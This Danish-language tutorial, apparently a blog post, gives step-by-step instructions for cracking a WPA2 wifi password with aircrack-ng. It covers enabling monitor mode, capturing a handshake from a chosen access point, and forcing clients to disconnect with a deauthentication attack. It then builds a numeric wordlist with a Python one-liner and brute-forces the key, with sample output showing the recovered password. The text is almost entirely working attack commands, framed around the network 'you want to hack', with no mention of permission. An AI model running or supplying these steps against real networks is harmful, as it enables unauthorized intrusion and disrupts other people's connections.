Før du går i gang, skal du sætte dit wifi-interface i monitor-mode. Dette gør du med:
airmon-ng start wlan0
Her er wlan0
navnet på wifi-interfacet (brug iwconfig
eller ifconfig
for at finde navnet på dit interface).
Dernæst køres airodump-ng wlan0
for at se tilgængelige access points (APs), samt hvilken kanal de kører på (channel 1-14).
Det fremgår også hvilket BSSID hvert AP har.
Når du kender BSSID på det AP du vil hacke, køres:
airodump-ng -c 5 --bssid AA:BB:CC:DD:EE:FF -w psk wlan0
Dette vil optage data fra et AP med BSSID AA:BB:CC:DD:EE:FF
, som kører på kanal 5 (-c 5
).
Output skrives til en række filer med præfiks psk
(angivet ved -w psk
).
Nu er det blot et spørgsmål om at vente på, at nogen forbinder til AP'et. Når det sker, ser det nogenlunde således ud:
21:08:39 Created capture file "psk-01.cap". CH 5 ][ Elapsed: 30 s ][ 2022-06-12 21:09 ][ WPA handshake: AA:BB:CC:DD:EE:FF BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID AA:BB:CC:DD:EE:FF -48 100 310 10114 312 5 130 WPA2 CCMP PSK TestAP ...
Den markerede del med WPA handshake
bliver vist så snart et handshake er opfanget.
Hvis du ikke vil vente på at nogen forbinder til AP'et, kan du evt. tvinge en klient til at afbryde forbindelsen til AP'et - for derefter sandsynligvis at forsøge at forbinde igen. Dette kan gøres med:
aireplay-ng --deauth 100 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0
Her er 11:22:33:44:55:66
klientens MAC-adresse (læs mere her).
Nu er data indsamlet, og du kan bruge aircrack-ng til at finde passwordet:
aircrack-ng -w wordlist.lst -b AA:BB:CC:DD:EE:FF psk*.cap
Kali Linux indeholder en del wordlists, men lad os i dette tilfælde sige at vi ved, at koden består af 8 tegn, som alle er tal. Vi kan i dette tilfælde lave en wordlist således:
python -c 'for i in range(0, 100000000): print("%08d" % (i,))' > wordlist.lst
Når aircrack-ng køres, får vi så:
Aircrack-ng 1.6 [00:21:24] 7425779/100000000 keys tested (5878.41 k/s) Time left: 4 hours, 20 minutes, 28 seconds 7.43% KEY FOUND! [ 07196562 ] ...
Det fundne password til AP'et er altså i dette tilfælde 07196562
.
Du kan lære mere om aircrack-ng her.